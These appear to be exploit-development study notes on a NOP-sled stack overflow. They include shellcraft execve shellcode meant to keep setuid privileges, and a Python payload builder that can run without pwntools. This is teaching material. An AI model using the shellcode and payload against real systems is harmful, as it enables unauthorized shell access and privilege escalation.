# Cut Stack in Half + NOPsled

* Stack has to be executable (no NX, e.g. binary linked with `-z execstack`)
* Payload layout: `cyclic` padding up to the saved `eip`, then the `eip` overwrite, then the NOPsled, then the shellcode. After `ret`, `esp` points at the start of the sled, so aim `eip` at roughly `esp` + half of the sled length: landing in the middle of the sled gives the most slack in both directions if the real stack address is not exactly what gdb showed (different environment, argv length, running outside gdb)
* **ASLR has to be off** (`/proc/sys/kernel/randomize_va_space` = `0`), otherwise the `eip` address pointing into the sled has to be brute-forced across many runs

## shellcraft

* for example

```sh
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
```

* `-p` keeps the effective uid when `sh` is started with euid != uid (setuid target); `-f s` prints the shellcode as an escaped string ready to paste into Python

## Usage

* measure the `eip` offset: generate a pattern, feed it to the program and crash it

```sh
cyclic <length>
```

* check the `eip` content in gdb (`info registers eip` or `p $eip`) and look up the 4 bytes in the pattern to get the offset

```sh
cyclic -l <eip value>
```

* Example code

```python
from pwn import *

crash_eip = ...                 # the 4 bytes / hex value gdb showed in eip after the crash
offset = cyclic_find(crash_eip) # distance from buffer start to the saved eip
padding = cyclic(offset)        # filler up to the saved eip

stack_addr = ...                # esp after ret, as seen in gdb (ASLR off)
eip = p32(stack_addr + ...)     # some offset into the sled, ideally about half its length

sled = b"\x90" * 100            # NOPsled (must be bytes, not an int)
shellcode = b"jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"

payload = padding + eip + sled + shellcode
```
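The whole procedure from the notes as an added, self-contained example (not code from the notes or from pwntools): it re-implements the three pwntools helpers the notes rely on, `cyclic`, `cyclic_find` and `p32`, in plain Python using the same de Bruijn construction, so it runs without pwntools and produces the same pattern bytes, and then shows why "cut the stack in half" works by checking whether the chosen return address still hits the sled when the real buffer address differs from the one gdb showed. The shellcode bytes are the shellcraft output copied from the notes; the crash value `0x61616174`, the buffer address `0xffffd000` and the stack shifts are constructed for the demo.

```python
import struct

# Copied from the notes: shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
SHELLCODE = (b"jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,"
             b"1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet`: every
    n-byte window occurs exactly once, so 4 bytes seen in eip map back to one
    offset. Same construction (and same bytes) as pwntools' cyclic()."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (stand-in for `cyclic <length>`)."""
    out = bytearray()
    for b in de_bruijn(n=n):
        if len(out) == length:
            break
        out.append(b)
    return bytes(out)


def cyclic_find(value, n=4):
    """Offset of the n-byte window `value` in the pattern (stand-in for
    `cyclic -l`). Takes the raw bytes or the integer gdb prints for eip,
    which is those same bytes read little-endian. Returns -1 if absent."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    if len(value) != n:
        raise ValueError(f"expected {n} bytes, got {len(value)}")
    window = bytearray()
    for i, b in enumerate(de_bruijn(n=n)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if window == value:
            return i - n + 1
    return -1


def p32(addr):
    """Little-endian 32-bit pack (stand-in for pwntools' p32)."""
    return struct.pack("<I", addr)


def sled_window(buf_addr, offset, sled_len):
    """Stack range the sled occupies: it begins right after the 4-byte saved
    eip slot, which is exactly where esp points once `ret` popped our address."""
    start = buf_addr + offset + 4
    return start, start + sled_len


def pick_ret_addr(buf_addr_in_gdb, offset, sled_len):
    """'Cut the stack in half': target the middle of the sled, so the buffer may
    sit up to sled_len/2 bytes above or below where gdb showed it and eip still
    lands on a NOP."""
    start, end = sled_window(buf_addr_in_gdb, offset, sled_len)
    return (start + end) // 2


def lands_in_sled(ret_addr, real_buf_addr, offset, sled_len):
    """Would the chosen return address hit the sled if the buffer really sits
    at `real_buf_addr` (e.g. shifted by a different environment outside gdb)?"""
    start, end = sled_window(real_buf_addr, offset, sled_len)
    return start <= ret_addr < end


def build_payload(offset, ret_addr, sled_len, shellcode=SHELLCODE):
    """padding | saved eip | NOP sled | shellcode, the layout from the notes."""
    return cyclic(offset) + p32(ret_addr) + b"\x90" * sled_len + shellcode


if __name__ == "__main__":
    # Constructed values: eip read 0x61616174 ("taaa") after the crash and gdb
    # showed the buffer at 0xffffd000; both are made up for the demo.
    offset = cyclic_find(0x61616174)
    ret = pick_ret_addr(0xffffd000, offset, sled_len=200)
    payload = build_payload(offset, ret, sled_len=200)
    print(f"offset={offset} ret=0x{ret:08x} payload={len(payload)} bytes")
    for shift in (-96, 0, 96, 104):      # buffer moved by env/argv differences
        print(f"stack shifted {shift:+4d}: lands in sled ->",
              lands_in_sled(ret, 0xffffd000 + shift, offset, 200))
```

With a 200-byte sled and the return address in its middle, the buffer may move by up to 99 bytes in either direction before `eip` misses the NOPs; a shift of 100 or more (the `+104` case above) crashes again, which is the point of making the sled as large as the buffer allows. The payload bytes are sent to the target the same way as in the notes (`process(...).sendline(payload)` with pwntools, or written to a file via `sys.stdout.buffer`).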